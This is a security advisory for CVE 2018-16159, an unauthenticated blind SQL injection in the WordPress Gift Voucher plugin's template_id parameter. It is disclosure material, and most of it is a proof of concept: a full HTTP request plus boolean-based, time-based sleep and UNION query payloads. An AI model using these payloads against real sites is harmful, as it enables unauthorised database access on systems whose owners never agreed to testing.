Gift Voucher < 4.1.8 – Unauthenticated Blind SQL Injection | CVE 2018-16159

Description

The wpgv_doajax_front_template AJAX action (both authenticated and unauthenticated, defined in the front.php) does not sanitise, validate or escape the template_id parameter before using it in a SQL statement, leading to a SQL Injection issue. This has been present since at least 1.0.5

v4.1.0 tried to sanitise user input with sanitize_text_field() which is not sufficient.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://example.com/gift-voucher/
Content-Length: 62
Connection: close

action=wpgv_doajax_front_template&template_id=1 and sleep(15)#


---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: action=wpgv_doajax_front_template&template_id=1 AND 9003=9003

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=wpgv_doajax_front_template&template_id=1 AND (SELECT 7241 FROM (SELECT(SLEEP(5)))tMgP)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: action=wpgv_doajax_front_template&template_id=-2386 UNION ALL SELECT NULL,CONCAT(0x7170707871,0x4656677465696944696672785453475a4c586a536b6f425868775270434659497663715269786f6e,0x716b626271),NULL,NULL,NULL,NULL,NULL-- -
---